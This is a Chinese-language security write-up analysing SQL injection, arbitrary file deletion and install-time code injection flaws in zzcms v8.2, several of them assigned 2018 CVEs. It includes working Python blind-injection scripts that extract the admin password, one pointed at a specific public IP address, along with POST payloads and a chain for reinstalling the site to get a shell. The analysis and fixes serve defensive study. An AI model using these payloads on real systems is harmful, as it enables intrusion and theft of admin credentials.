zzcms v8.2 中的众多cve分析

看了一下最近的cve列表,发现有大佬怒刷了好多个cve,这个zzcms都快被审穿了,所以跟进学习一下

 

CMS背景

本文跟踪的这个cms,属于一个开源招商网站管理系统,属于比较小的cms,所以很多地方写的不是很完善,导致了漏洞的产生,项目官网为http://www.zzcms.net/,本次我跟进的版本为8.2。

 

CVE-2018-8966

首先,这是一个在安装的时候的代码注入,如果不配合其他漏洞删除安装后产生的锁文件install.lock,这个漏洞在实际环境中将毫无作用。
下面我们来具体分析一下漏洞产生的原因:
系统在安装的过程中,对输入的变量并没有任何过滤就写入了文件,所以我们只要闭合有关代码,然后注入命令就可以拿到shell。
下面开始复现:

复现成功,同理,这里既然能插入php代码,那也可以插入一端javascript代码,造成存储型xss,具体流程不在分析。

 

CVE-2018-8967

这是一个前台的sql注入,可以获取管理员密码的账号密码,问题出在了/user/adv2.php下面我们分析一下代码:

这里整个cms还是对传入的cms进行了过滤的,过滤代码在/inc/stopsqlin.php,但是在这个地方,是没有对sql变量用引号包裹,所以不用单引号也可以直接进行sql注入。

但是这个地方想要注入,前面需要满足一定的条件,见下图
至少要让这两个数据出来的值有一个是1,否则将不会进入注入的代码。
这里的坑点比较多,简单讲下吧,有一个知识点:

select * from zzcms_ad where id =1 or sleep(4);
按照常理这个会延时,但是如果表中是空的,那这个将不会有任何延时

所以我们在注入的时候,要保证表中有数据,才能正常延时盲注的
所以这里要利用这个盲注,需要满足的条件有:

  1. 注册为企业用户,并且通过审核
  2. 发布广告,报账zzcms_main中,有一条记录
  3. 整个网站的广告表zzcms_add中需要至少有一条数据

当上面的条件都满足的时候,就可以进行注入了,下面贴一下paylaod:

import requests
import string
s = requests.session()
url = "http://127.0.0.1:8000/user/adv2.php?action=modify"
cookies = {
'UserName':'test1',#换成你注册的企业用户的用户名
}
flag = ''
for i in range(1,40):
    for j in range(33,125):
        data = {
            'id':'0 or if((select ascii(substr(pass,{},1)) from zzcms_admin)={},sleep(3),0)'.format(i,j)}
        try:
            r = s.post(url,data=data,cookies=cookies,timeout=1)
        except:
            flag += chr(j)
            print flag
            break
print flag

实际测试截图:

 

CVE-2018-8965

这是一个任意文件删除漏洞,危害还是很大的,配合上面的安装过程中的getshell,还是可以有很大的攻击面
出问题的代码在:/user/ppsave.php
可以发现并没有什么验证,只是判断了一下是不是和之前的或者默认的一样,然后只要文件存在,就使用了unlink删除了文件.
所以这个漏洞分析和利用都很简单
我们删除了安装的锁文件/install/install.lock
然后就可以重新安装zzcms,从而配合上文分析的漏洞获取shell。

CVE-2018-9309

又是一枚sql注入漏洞,不过这个也是一个需要登陆,需要设置相关信息才能利用的漏洞。属于设计不当。
首先我们看一下出问题的核心代码:

if (!empty($_POST["sql"])){//从模板中获取SQL内容,为发送对像
    $_SESSION['sql']=stripfxg($_POST["sql"]);
}
$sql=$_SESSION['sql'];
$sql2=$sql." order by id asc limit $n,$size";
$rs=query($sql2); 
$row=num_rows($rs);

可以发现这里将post参数中的sql进行了解码放进了session中,而stripfxg函数代码如下:

function stripfxg($string,$htmlspecialchars_decode=false,$nl2br=false) {//去反斜杠 
$string=stripslashes($string);//去反斜杠,不开get_magic_quotes_gpc 的情况下,在stopsqlin中都加上了,这里要去了
if ($htmlspecialchars_decode==true){
$string=htmlspecialchars_decode($string);//转html实体符号
}
if ($nl2br==true){
$string=nl2br($string);
}
return $string; 
}

可以发现并不是什么过滤,所以这里直接拼接进入sql中是及其危险的,后面还有一些没有申请cve的漏洞也是因为调用了这个函数,导致了过滤失效。
代码利用也是比较简单的:

127.0.0.1/dl/dl_sendmail.php
post数据为:
sql=select email from zzcms_dl where id=-1 union select group_concat(table_name) from information_schema.columns where table_schema=database()#

下面是执行结果:

 

CVE-2018-9331

有一枚任意文件删除漏洞,不得不说这个系统在这个的判断上真的是很有问题
这次产生问题的文件在/user/adv.php
也是一个oldimgimg对比产生的问题

和上面分析类似,都是只判断了是否和原来的相同,然后拼接了../就直接调用unlink,所以利用也很简单
只需要将html中表单属性的hidden删掉,然后直接输入想要删除的文件名就可以啦

 

没有申请cve的漏洞

有几个sql注入比较严重,下面逐个分析一下

No.1 getip()未过滤

出问题的代码在/user/check.php
在检查用户登录的位置,发现会调用getip()这个函数,我们跟进看一下:
发现并没有过滤,可以直接注入xff头,来进行注入,注入脚本如下:

import requests
import string
s = requests.session()
url = "http://219.219.61.234:8000/user/adv.php"//只要include了check.php都可以
cookies = {
'UserName':'test1',
'PassWord':'21232f297a57a5a743894a0e4a801fc3'
}
flag = ''
for i in range(1,40):
    print i
    for j in range(33,125):
        head = {
            'X-Forwarded-For':"1' where username = 'test1' and if((select ascii(substr(pass,{},1)) from zzcms_admin)={},sleep(10),0)#".format(i,j)}
        try:
            r = s.post(url,headers=head,cookies=cookies,timeout=9)
        except:
            flag += chr(j)
            print flag
            break
print flag

测试截图为:

No.2 del.php未过滤

第二个注入产生的根源还是过滤的不够严格,全局的注入过滤,在没有引号的地方可以随意注入,出问题的代码在/user/del.php
不过这个注入有一个前提,我们需要先发布一个咨询信息,然后管理员审核过以后,就可以利用来注入了,这个在实际场景中,还是可以实现的。
可以看到,直接将tablename拼接进入了sql语句中,所以利用起来难度也不是很大,但是这里并没有回显,所以需要使用时间盲注,或者dns log外带的方法来获取数据。

No.3 stripfxg过滤不完整

在整个系统中,还有个函数是非常危险的,他可以将全局过滤还原成正常的数据,如果这个数据带入了sql查询中,是可以直接造成注入的。
代码逻辑:
所以这里的利用也是比较简单的:

POST /user/msg.php?action=savedata&saveas=add 
参数为:
info_content=123' ^ sleep(5))#&id=1&Submit2=%E4%BF%AE%E6%94%B9%0D%0A

这里有一个注入的小技巧,就是在做insert注入和update注入的时候,除了能够多伪造一组数据以外,还可以使用这种异或符号加上sleep函数来延时注入
insert into user (content)VALUES('1' ^ if(1=1,sleep(5),0)#

验证截图:

 

总结

系统存在的问题:

  1. 系统在实现逻辑的过程中,存在了太多了没有过滤直接带入逻辑的情况,这在很多大的框架中是不存在的,建议可以自己封装一层,在封装层中间实现好过滤,用起来也很方便
  2. 系统对用户文件的存储删除有很大问题,很多在删除用户文件的时候,并没有检查是不是合法,就直接unlink了,这可以导致很大的问题。
  3. 系统在很多地方很轻易的就将自己的过滤去掉了,核心就是那个stripfxg函数,建议减少这个函数的使用,保证所有变量都经过了过滤。
(完)